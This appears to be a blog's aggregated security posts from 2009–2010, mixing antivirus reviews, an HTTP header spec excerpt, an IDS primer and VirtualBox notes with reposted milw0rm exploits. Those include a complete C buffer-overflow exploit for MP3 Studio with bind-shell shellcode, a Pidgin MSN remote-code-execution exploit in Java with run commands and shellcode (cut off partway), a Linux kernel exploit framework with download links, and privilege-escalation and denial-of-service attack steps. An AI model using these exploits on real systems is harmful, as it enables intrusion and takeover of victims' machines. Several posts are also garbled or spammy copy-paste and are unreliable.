answer the prompt "Should the vboxdrv kernel module be compiled now?" with "Yes"

If it fails, have a look at /var/log/vbox-install.log and re-run /etc/init.d/vboxdrv setup after fixing the problem (usually missing header files, compiler, etc.)

start via "/usr/bin/VirtualBox" (case-sensitive!)
Virtualbox is now ready, have fun!

Note:
Thanks to dkms, the VirtualBox host kernel modules (vboxdrv,
vboxnetflt and vboxnetadp) will be updated automatically if the linux kernel
version changes during the next apt-get upgrade.

source marsmenschen.com

Kaspersky Internet Security 2010 Improved Features

2010-03-16T19:32:00.001+07:00

In the areas where it really counts, Kaspersky Internet Security 2010 does a fantastic job at detecting, preventing, and eliminating viruses, spyware, adware, and other malicious software.

We like Kaspersky a lot, and they've consistently been one of the best, most innovative antivirus security software vendor for many years.

Our testing showed excellent results in all areas of security protection with only a couple of areas that could use further revision.

Overall, Kaspersky delivers excellent virus and malware protection, but only average anti-phishing and parental controls, and a less-than-perfect firewall.

IMPROVED FEATURES
• Great Antivirus Protection
• Better Spyware Protection
• Solid Real-time Coverage

Every year brings significant progress from Kaspersky; we hope they'll improve some of their deficiencies this year (and lower the price.) Regardless though, Kaspersky is a terrific Internet Security suite for anyone.

HTTP Header 1.1

2010-03-01T19:45:00.001+07:00

Header Field Definitions
This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity.
Accept

The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image.

Accept = "Accept" ":"
#( media-range [ accept-params ] )
media-range = ( "*/*"
| ( type "/" "*" )
| ( type "/" subtype )
) *( ";" parameter )
accept-params = ";" "q" "=" qvalue *( accept-extension )
accept-extension = ";" token [ "=" ( token | quoted-string ) ]

The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range.
Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1.

Note: Use of the "q" parameter name to separate media type
parameters from Accept extension parameters is due to historical
practice. Although this prevents any media type parameter named
"q" from being used with a media range, such an event is believed
to be unlikely given the lack of any "q" parameters in the IANA
media type registry and the rare usage of any media type
parameters in Accept. Future media types are discouraged from
registering any parameter named "q".

The example

Accept: audio/*; q=0.2, audio/basic

SHOULD be interpreted as "I prefer audio/basic, but send me any audio type if it is the best available after an 80% mark-down in quality."
If no Accept header field is present, then it is assumed that the client accepts all media types. If an Accept header field is present, and if the server cannot send a response which is acceptable according to the combined Accept field value, then the server SHOULD send a 406 (not acceptable) response.
A more elaborate example is

Accept: text/plain; q=0.5, text/html,
text/x-dvi; q=0.8, text/x-c

Verbally, this would be interpreted as "text/html and text/x-c are the preferred media types, but if they do not exist, then send the text/x-dvi entity, and if that does not exist, send the text/plain entity."
Media ranges can be overridden by more specific media ranges or specific media types. If more than one media range applies to a given type, the most specific reference has precedence. For example,

Accept: text/*, text/html, text/html;level=1, */*

have the following precedence:

1) text/html;level=1
2) text/html
3) text/*
4) */*

The media type quality factor associated with a given type is determined by finding the media range with the highest precedence which matches that type. For example,

Accept: text/*;q=0.3, text/html;q=0.7, text/html;level=1,
text/html;level=2;q=0.4, */*;q=0.5

would cause the following values to be associated:

text/html;level=1 = 1
text/html = 0.7
text/plain = 0.3
image/jpeg = 0.5
text/html;level=2 = 0.4
text/html;level=3 = 0.7

Note: A user agent might be provided with a default set of quality
values for certain media ranges. However, unless the user agent is
a closed system which cannot interact with other rendering agents,
this default set ought to be configurable by the user.

Source and keep reading

Download via Ziddu Mirror

Intrusion Detection System Tutorial

2010-03-01T19:40:00.000+07:00

An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.

IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding.They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack’s content.

Source

Haiti World Earthquake Virtual Worlds

2010-02-14T19:11:00.000+07:00

Haiti recently hit by powerful earthquake. Haiti beaten by 7 earthquake richter scale. The impact of the earthquake is very sad. Victims of the earthquake was not a bit. An estimated 75 thousand people buried in rubble and about 200 thousand people were killed by the earthquake. Assistance from all over the world came. Donations through the virtual world is emerging. It turned out to have been exploited by online criminals.

Online criminals deceive via email and fake websites designed to steal what should be a charitable donation. Symantec has seen online scams spread with themes including Haiti earthquake spam email asking for donations and manipulate search results that can infect computers with malware.

Symantec security experts called on computer users to follow the smart ways to be safe online, and ensure that your donations and assistance to disaster victims and not to con men.

When contributing to a charity online, always remember:

Avoid clicking on suspicious links in emails or IM messages because it may be a link to a fake website. Symantec security experts recommend to type the Web address, such as the Web address charitable organizations, directly into the browser instead of clicking the link in the message.

Do not ever fill out a form in a message requesting personal information, financial or password. A charitable organization has a reputation can not be asked for personal information via e-mail. If you are in doubt, contact the organizations directly concerned by a trusted independent mechanism, such as phone numbers have been verified, or Internet address that you enter into a new browser menu (do not click on or cut and paste the link in the message).

MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit

2010-02-14T19:10:00.000+07:00

/* mplode.c vs MP3 Studio v1.0
* Tested on: Windows 2000 SP4
*
* Author: Dominic Chell
*
* PoC: http://www.milw0rm.com/exploits/9277
* The PoC author said he could not exploit it so I decided to try.
*
* A bit of fun for a boring night in Peterborough :(
* Good luck finding someone who uses this media player.
*/

#include "stdafx.h"
#include
#include
#include
#include

#define usage(){ (void)fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc \n\nExample: mplode.exe [output file]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// bind shell lport = 4444
char shellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";

char *seh = "\xC4\x2A\x02\x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "\xeb\x10\x90\x90";
// short jmp nop nop

int main(int argc, char *argv[])
{
char outfile[20];
if(argc < 2) { usage(); return 0; } if(strlen(argv[1])<15) { strncpy(outfile, argv[1], 14); outfile[14] = '\0'; } else strcpy(outfile, "mplode.m3u"); FILE *fp = fopen(outfile, "w"); if (!fp) error("[*] Cannot output file\n"); fwrite("http://", 7, 1, fp); for (int i=0; i<4103; i++) { fwrite("\x41", 1, 1, fp); } fwrite(nextseh, 4, 1, fp); fwrite(seh, 4, 1, fp); for (int i=0; i<500; i++) { fwrite("\x90", 1, 1, fp); } fwrite(shellcode, sizeof(shellcode), 1, fp); fclose(fp); fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc \n\n", outfile);
fprintf(stderr, "[*] Success, exploit written to %s\n", outfile);

exit(0);

return 0;
}

source milw0rm.com

Using Internet safely with Kaspersky Internet Security 2010

2010-01-27T21:23:00.000+07:00

Fully Automated Real-Time Protection

Kaspersky Internet Security 2010 stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers:

* Keeps your money and identity safe
* Protects against bank account fraud
* Safeguards against online shopping threats
* Cybercriminals won’t hi-jack your PC
* Family protection from on-line predators
* Your files won’t be ruined by hackers
* Keeps your PC running smoothly
* Safer Wi-Fi connections
* Two way personal firewall

New And Improved Features
Kaspersky Internet Security 2010 offers a number of new and improved features together with unique protection technologies to address the latest online threats, keep your PC running smoothly and customize protection according to your activities:

* Unique Safe Run Mode for questionable applications and websites
* Security Application Monitor to give you full picture on programs installed on your PC
* Identity Information Controller to give valuable data an extra layer of protection
* Kaspersky Toolbar for Internet browsers to warn you about infected or unsafe websites
* Advanced identity theft protection, including improved secure Virtual Keyboard
* Urgent Detection System to stop fast emerging threats
* Next generation proactive protection from zero-day attacks and unknown threats
* Special Game Mode to suspend alerts, updates and scans while you play

Advanced Features For Better Protection
Kaspersky Internet Security 2010 has a range of unique tools for heightened security. Protecting your family and keeping your PC healthy:

* Run questionable applications and websites in Safe Run Mode
* Enter logins and passwords using secure Virtual Keyboard
* Enable Parental Control for added child safety online
* Turn on Game Mode to suspend alerts, updates and scans
* Add folders and files with valuable data to the protected area
* Scan system and installed applications for vulnerabilities
* View applications working on your PC and customize their rules
* Tune up your OS and Internet browser settings for better security
* Restore correct system settings after malware removal
* Burn a Rescue CD to restore your system in case of infection
* Remove activity traces in your Internet browser (history, cookies, etc.)

Get Protection From a Range of Threats :
Award-winning technologies in Kaspersky Internet Security 2010 protect you from cybercrime and a wide range of IT threats :

* Viruses, Trojans, worms and other malware, spyware and adware
* Rootkits, bootkits and other complex threats
* Identity theft by keyloggers, screen capture malware or phishing scams
* Botnets and various illegal methods of taking control of your PC
* Zero-day attacks, new fast emerging and unknown threats
* Drive-by download infections, network attacks and intrusions
* Unwanted, offensive web content and spam

Homepage

Information Linux Null PTR Dereference Exploit Framework

2010-01-27T21:18:00.000+07:00

To create your own exploit module for enlightenment, just name it
exp_whatever.c
It will be auto-compiled by the run_exploits.sh script and thrown into
the list of loaded exploit modules

Each module must have the following features:
It must include this header file, exp_framework.h
A description of the exploit, the variable being named "desc"
A "prepare" function: int prepare(unsigned char *ptr)
where ptr is the ptr to the NULL mapping, which you are able to write to
This function can return the flags described below for prepare_the_exploit
Return 0 for failure otherwise
A "trigger" function: int trigger(void)
Return 0 for failure, nonzero for success
A "post" function: int post(void)
This function can return the flags described below for post_exploit
A "get_exploit_state_ptr" function:
int get_exploit_state_ptr(struct exploit_state *ptr)
Generally this will always be implemented as:
struct *exp_state;
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
It gives you access to the exploit_state structure listed below,
get_kernel_sym allows you to resolve symbols
own_the_kernel is the function that takes control of the kernel
(in case you need its address to set up your buffer)
the other variables describe the exploit environment, so you can
for instance, loop through a number of vulnerable socket domains
until you detect ring0 execution has occurred.

That's it!
*/

http://www.grsecurity.net/~spender/enlightenment.tgz
back: http://milw0rm.com/sploits/2009-enlightenment.tgz

source milw0rm.com

Automated Vulnerability Detection System

2010-01-08T15:25:00.001+07:00

Automate Your Penetration Testing

AVDS is a network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses.

In a matter of hours and with no network down time or interruption of services AVDS will generate detailed reports specifying network security weaknesses.

Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.

Simple, Fast and Comprehensive

Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, plagued by high false positive rates and cause network resource issues.

Automated Testing Using AVDS:
• Gets your tactical security work done routinely and quickly
• Provides the fixes you and your staff need for fast mitigation
• Buys you time to focus on security strategy
• Automatically scans new equipment, ports and applications
• Scales to handle multiple networks, business units, countries
• Reduces your patch-work by identifying exactly what is needed.

Security and Compliance Challenges
Read More

The frequency and increasing severity of today's security threats are forcing companies to:
• Simplifies PCI-DSS, SOX and HIPAA compliance and reduces costs
• Strengthen current network security processes and procedures to protect against virulent worm/virus attacks from both external and internal threats
• Deploy new security solutions that span the entire network
• Restrict customer and partner access and permissions
• Respond to "Security Compliance" mandates, IT upgrades and internal policy changes
• Perform more frequent penetration tests.

Vulnerability Management

AVDS conducts automated vulnerability scans daily, weekly or monthly, or on ad-hoc basis. It records results and generates vulnerability trends for your entire WAN a LAN or single IP address. With three levels of reporting, each business unit can receive a report on it's own network and local results can be combined into a company wide picture.

Know What You Are Up Against

Pin point your most vulnerable IPs by either a ranked list or graph. Use AVDS to identify exactly which patches, solutions and workarounds to install. Re-scan networks and hosts after solutions have been implemented to verify and document compliance and remediation.

Solutions to Vulnerabilities Delivered

Each AVDS report contains the exact solutions to repair the problems found. This in-depth information shows how to fix and improve the security of your network, both as whole and for each of the devices in it. The recommended solutions include device specific information as well as custom tailored solutions for your environment.

Manage Vulnerabilities Across the Enterprise

Whether your network is as small as one LAN or involves hundreds of business units separated by firewalls, or even continents, all testing and report generation can be managed and controlled from one location with individual reports being automatically delivered to each business unit. Multiple scanners can be used to overcome bandwidth restrictions, firewall segmentations or to load balance and provide fault tolerance.

Source beyondsecurity.com

Another option for computer and internet security here

Network Security Software

2010-01-06T11:40:00.000+07:00

Network security threat is one of the major concerns for all online businesses today. As soon as the computer software was produced the hackers set off on their task of destroying software. In networks the more important thing than software is the data as the data contain sensitive information. Hackers send their programs to either destroy the data bases or steal data. Both are equally dreaded by network administrators.

Network security threat

To avert network security threat, the software companies have come out with software which is able to locate intruding software and prevent them from accessing data bases. To use this software special training should be provided to network administrators. A network security course conducted by professionals for the network administrators will be of immense value for the security of the network.
As the viruses and other programs used by hackers are posing a continuous network security threat, the knowledge of network administrators need to be updated continuously. As such a network security course at regular intervals is the way to avert network security vulnerability.

There are various software programs produced by many software companies such as Norton antivirus, AVG. Kaspersky, and McAfee. These software companies are updating their software at regular intervals, as the hackers learn about the software as soon as an update is released. Then they make viruses and other programs to beat the particular software. When the Computer network security software companies come to know that, they make an update to beat the malware. This goes on in a vicious cycle. The poor network managers suffer most, for no fault of theirs, trying to cope with all these Network security threats, all because of the network security vulnerability of their net works.

Once the proper software is installed, timely updates are arranged and the necessary training given to the administrators, a network could run with out much security threat.

source g-hwebdesigns.com

need more antivirus solution here

Web hosting sites

2010-01-06T11:29:00.000+07:00

Web hosting is now widely used of netter to introduce their web commercial nette, lot from year to year using good web hosting service is paid or for free, and many benefits if we use the web-hosting, some of which we become more web easy to remember, unique and certainly more commercially profitable.
technically, the use of web hosting can be seen from some of the features available, because many web hosting providers that offer additional features such as relatively low prices, large disk space, usage period and warranty service, even free web hosting providers even dare to compete with providers are paid, our living choices.
Through this website, the netter can choose web hosting providers the most demanding of the world, best 10 web hosting sites that dare to compete provided from various sides, ranging from price, how to setup, domain, disk space, money back, and the usage period .
Through this website explained that the list of top web hosting is the most widely sought after by netter, affordable prices is one reason why the netter choose one of the ten web hosting these sites.
how about you? are already interested in using the best web hosting around the world to introduce your personal website?
The 10 top web hosting sites are among others BlueHost, JustHost, inmotion hosting, HostMonster, fatcow, supergreen, HostGator, 1and1, GoDaddy, and the last isyahoo web hosting, good luck

Protector Plus Antivirus Local Privilege Escalation Vulnerability

2010-01-06T11:24:00.000+07:00

ShineShadow Security Report 15092009-09

TITLE

Local privilege escalation vulnerability in Protector Plus antivirus software

BACKGROUND

Protector Plus range of antivirus products are known the world over for
their efficiency and reliability. Protector Plus Antivirus Software is
available for Windows Vista, Windows XP, Windows Me, Windows 2000,
Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector
Plus Antivirus Software is the ideal antivirus protection for your
computer against all types of malware like viruses, trojans, worms and
spyware.

-- www.pspl.com

VULNERABLE PRODUCTS

Protector Plus 2009 for Windows Desktops (8.0.E03)
Protector Plus 2009 for Windows Server (8.0.E03)
Protector Plus Professional (9.1.001)

Previous versions may also be affected

DETAILS

Protector Plus installs the own program files with insecure permissions
(Everyone - Full Control). Local attacker (unprivileged user) can
replace some files (for example, executable files of Protector services)
by malicious file and execute arbitary code with SYSTEM privileges. This
is local privilege escalation vulnerability.

For example, the following attack scenario could be used:
1. An attacker (unprivileged user) renames one of the Protector program
files (below, the FILE). For example, the FILE could be - PPAVMON.exe
(Protector Plus Anti-virus Monitor Service).
2. An attacker copies his malicious executable file (with same name as
the old filename of the FILE - PPAVMON.exe) to Protector folder.
3. Restart the system.
After restart attackers malicious file will be executed with SYSTEM
privileges.

EXPLOITATION

This is local privilege escalation vulnerability. An attacker must have
valid logon credentials to a system where vulnerable software is
installed.

WORKAROUND

No workarounds

DISCLOSURE TIMELINE

31/08/2009 Initial vendor notification. Secure contacts requested.
01/09/2009 Vendor response
03/09/2009 Vulnerability details sent. Confirmation requested. – no reply
09/09/2009 Vulnerability details sent. Confirmation requested. – no reply
11/09/2009 Last attempt to get reply from vendor. Vulnerability details sent. Confirmation requested. – no reply
15/09/2009 Advisory released

CREDITS

Maxim A. Kulakov (aka ShineShadow)
ss_contacts[at]hotmail.com

source milw0rm.com

IceSword Anti Rootkit Software

2009-12-09T20:52:00.005+07:00

A rootkit is a collection of software that aims to hide processes, files and data systems running operating systems from a shelter where he (administrator level access). Rootkit which was a harmless application, but the latter is widely used by malware to help intruders goals, maintain their action into the system so as not detected. Rootkit present in a variety of operating systems such as Linux, Solaris and Microsoft Windows. This rootkit is often modify parts of the operating system and also install themselves as drivers or modules kernel. Imaginable how dangerous if this happens.

There are some virus/trojan/rootkit that is able to hide itself completely from Windows Task Manager and believe it or not, even the famous Process Explorer and Process Hacker cannot even detect the hidden process. Other than that, when the virus is active, they can also make the file hidden until you cannot locate it using Windows Explorer. I found a tool called IceSword which has a Windows Explorer-like interface but displays hidden processes and resources that Windows Explorer would never show.
Do note that IceSword isn’t a “click-here-to-delete-rootkits” product but a sophisticated discovery tool that can protect against sinister rootkits if used before they infect a machine. One thing I really like about IceSword is it is portable, free and can be used in Safe Mode. Normally tools that is used to detect hidden process and files (such as DeepMonitor and many more) requires a special driver
installed and it won’t work in Safe Mode since third party drivers/services are not loaded in that environment.
Here’s a piece of bad news that might be a turn off to a lot of people. IceSword is a software made in China by a person called PJF. I know now even more people would stay away from Chinese software because of what IObit did but so far IceSword has a very good reputation. Scanning it in VirusTotal with 41 antivirus and only ClamAV detects it as a threat just because the program is packed/compressed with ASPack.
Anyway I’m just sharing with you on a tool which I found useful and if you’re not comfortable using it, then by all means go ahead and use GMER which is very similar to IceSword. It’s good to have an alternative in case one of it doesn’t work. Here’s a short video demo of IceSword able to detect a folder which is completely hidden from Windows Explorer even if the Folder Options is set to show hidden files and folders.

Download IceSword Anti Rootkit Software here
IceSword122en.zip MD5 : 49582e999155cdf2812a1d645caf0831

Xerver HTTP Server Remote Denial of Service

2009-12-09T20:46:00.000+07:00

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to a remote denial of service through following means.

Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.

The admin package runs on port 32123 and does not require any form of
authentication to make changes to the server configuration.

- Bug -

If the HTTP Server port is set to any kind of letter combination, the server will
crash and be unable to be restarted unless the configuration file is manually
edited to remove the letters and put back to a number (ie. 80).

- Example -

1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue

- Results -

The server will crash hard, and you will be unable to restart it. You must edit the
configuration file, Xerver2.cfg and replace the first line of the file with a Port
number.

- Note -

I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone
else can figure it out.

Methods and variables of interest for this attack:

SubmitForm()
document.myForm.portNR.value="80" # default, any letters here would kill the server

source milw0rm.com

Virus spreading via PDF

2009-11-01T22:31:00.000+07:00

Virus writers have created an exploit for an unpatched vulnerability in Adobe Flashplayer, Acrobat and Acrobat reader. The vulnerability exists in these applications on all platforms, Windows, OS X, Linux and Solaris.

The vulnerable products are:

* Adobe Reader 9.1.2 and earlier 9.x versions
* Adobe Flash Player 9.0.159.0 and 10.0.22.87 and earlier 9.x and 10.x versions

You can read the alert from Adobe at: http://www.adobe.com/support/security/advisories/apsa09-03.html

The exploit runs with the privileges of the current user. The known virus is delivered as a PDF file which could be attached to an email or posted on a web page.

OIT has seen an instance of an infected computer sending email with .PDF attachments. The emails had a message saying the attachment was an e-card or an invoice for a recent purchase. Usual warnings apply, if you weren't expecting an email with an attachment, don't open the PDF attachment. If you don't know the sender, don't open the PDF attachment.

The malicious PDF contains flash content. In the Windows environment, if the malicious PDF is opened with an Adobe product, it will exploit the vulnerability via the flash player .dll called authplay.dll. On a Windows system, it is apparently possible to disable the connection between Acrobat and Flash by renaming that .dll and one in the same directory called rt3d.dll. This is the only workaround at this time. There are alternate PDF viewers that would not be vulnerable.

According to malware analysts, the exploit will work on Windows 9x, NT, 2K, XP, Vista, Server 2000 and Server 2003.

Adobe is working on a patch and says it will be ready for all platforms, but Solaris, on 7/30/09. So until then, use caution when opening that PDF. If you receive a PDF that crashes Acrobat, I'd like to know.

source oit.ncsu.edu

IE8 Clickjacking Protection Exposed

2009-11-01T22:28:00.001+07:00

Yesterday I published a blind analysis of the so called “Clickjacking protection” included in IE8 RC1. “Blind” because, hype aside, there was no technical documentation available, even if the feature was targeted to web developers who — in order to protect their users — should modify the way their pages are served.

After a while, Microsoft’s David Ross sent me an email confirming that my wild guesses about IE8’s approach, its scope and its limitations were indeed correct. The only information obviously missing from my “prophetic” description was the real name of the “X-I-Do-Not-Want-To-Be-Framed-Across-Domains” HTTP header to be sent before the sensible pages, and today this little mystery has been finally unveiled by Eric Lawrence on the IE Blog:

Web developers can send a HTTP response header named X-FRAME-OPTIONS with HTML pages to restrict how the page may be framed. If the X-FRAME-OPTIONS value contains the token DENY, IE8 will prevent the page from rendering if it will be contained within a frame. If the value contains the token SAMEORIGIN, IE will block rendering only if the origin of the top level-browsing-context is different than the origin of the content containing the X-FRAME-OPTIONS directive. For instance, if http://shop.example.com/confirm.asp contains a DENY directive, that page will not render in a subframe, no matter where the parent frame is located. In contrast, if the X-FRAME-OPTIONS directive contains the SAMEORIGIN token, the page may be framed by any page from the exact http://shop.example.com origin.

As I had anticipated, IE8’s “clickjacking protection” is just an alternate scriptless way to perform frame busting, a well known and simple technique to prevent a page from being “framed” in another page and therefore becoming an easy UI Redressing target. Microsoft had to follow its own special path because the traditional JavaScript implementation can be easily circumvented on IE, e.g. by loading the targeted page inside an IFRAME SECURITY=restricted element. But the other major browsers are equally “protected” (if we can call “browser protection” something relying on the good will and education of web authors) by “standard” frame busting. Therefore, slogans like “the first browser to counter this type of threat” (James Pratt, Microsoft senior product manager) were marketspeak at its best. Furthermore, this approach is useless against Clickjacking in its original “historical” meaning, i.e. those attacks involving Flash applets and other kinds of plugin embeddings which led Robert “RSnake” Hansen and Jeremiah Grossman to invent the successful buzzword.

However in my post I had also written that having such a scriptless alternative as a cross-browser option would be nice:

I do believe that a declarative approach to control subdocument requests is an excellent idea: otherwise I wouldn’t have included the SUB pseudo-method in ABE Rules Specification (pdf). Moreover, as soon as I’ve got some less blurry info (David Ross, I know you’re listening, why don’t you drop me a line?), I’ll be happy to immediately implement a compatible feature in NoScript and lobby Mozilla for inclusion in Firefox 3.1.

David kindly answered

I think this would be fantastic and it’s a great place to start building some bridges.

I agree, in facts I’ve filed an enhancement request for Firefox, and I’m already working to release a NoScript development build featuring X-FRAME-OPTIONS support: that’s relatively easy, since I can hook in the work I’m already doing for the ABE module. (Update 2009-29-01: I just released NoScript 1.8.9.9 development build, featuring full experimental X-FRAME-OPTIONS compatibility support).
It’s worth noticing, though, that this is just a cross-browser compatibility effort: neither Firefox nor NoScript really need this feature. Traditional JavaScript-based frame busting works fine in Firefox, giving it the same degree of (modest) “protection” as IE8. NoScript users, on the other hand, are already fully protected, because ClearClick is the one and only countermeasure which works against any type of Clickjacking (frame or embed based), no matter if web sites cooperate or not.

Speaking of NoScript, I’ve got a small but important correction to the otherwise excellent article Robert McMillan wrote for PC World (IDG News) yesterday:

Because clickjacking requires scripting, the attack doesn’t work when NoScript is enabled.

This statement is wrong twice:

1. Clickjacking does not require scripting: JavaScript might make the attacker’s life easier, but it’s not indispensable to throw an attack.
2. NoScript does not need scripting to be disabled in order to protect its users against Clickjacking: its exclusive ClearClick anti-Clickjacking technology works independently from script blocking.

That’s why NoScript can be recommended to anyone, even to grandma who’s not inclined to block JavaScript: albeit I do not encourage using NoScript’s “Allow Scripts Globally” command because the default deny policy is your best first-line defense, many additional protection features such as Anti-XSS filters and ClearClick still remain active even when JavaScript is enabled, providing the safest web experience available in any browser.

source hackademix.net

Pidgin MSN 2.5.8 Remote Code Execution

2009-11-01T22:11:00.002+07:00

Pidgin MSN <= 2.5.8 Remote Code Execution

Pierre Nogues - pierz@hotmail.it
http://www.indahax.com/

Description:
Pidgin is a multi-protocol Instant Messenger.

This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
which could lead to memory corruption.

Affected versions :
Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.

Plateforms :
Windows, Linux, Mac

Fix :
Fixed in Pidgin 2.5.9
Update to the latest version : http://www.pidgin.im/download/

References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
[2] http://www.coresecurity.com/content/libpurple-arbitrary-write
[3] http://www.pidgin.im/news/security/?id=34

Usage :
You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
download source code, click here

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,

/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
